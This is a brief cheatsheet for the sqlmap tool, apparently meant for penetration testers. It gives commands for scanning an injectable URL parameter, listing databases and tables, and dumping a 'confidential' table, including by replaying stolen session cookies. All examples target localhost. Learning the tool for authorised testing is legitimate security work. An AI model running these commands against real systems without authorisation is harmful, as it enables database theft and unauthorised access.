SQLMap Cheatsheet

SQLMap Cheatsheet

NOTE: All dumps can be found in $HOME/.sqlmap folder

Scan a URL

sqlmap -u <url>
sqlmap -u http://127.0.0.1?id=65

List all the database

sqlmap -u http://127.0.0.1?id=65 --dbs

List Tables in the Users database

sqlmap -u http://127.0.0.1?id=65 --tables -D users

Dump all tables from users databse

sqlmap -u http://127.0.0.1?id=65 --dump -D users

Dump confidential table from users databse

sqlmap -u http://127.0.0.1?id=65 --dump -D users -T confidential

Dump confidential table from users databse with cookies

sqlmap -u http://127.0.0.1?id=65 --dump -D users -T confidential --cookie='cookie1=val1;cookie2=val2'

Where cookie1, cookie2 are cookie name and val1 & val2 are their values respectively, you can obtain it from browser dev tools.


Original:  Updated: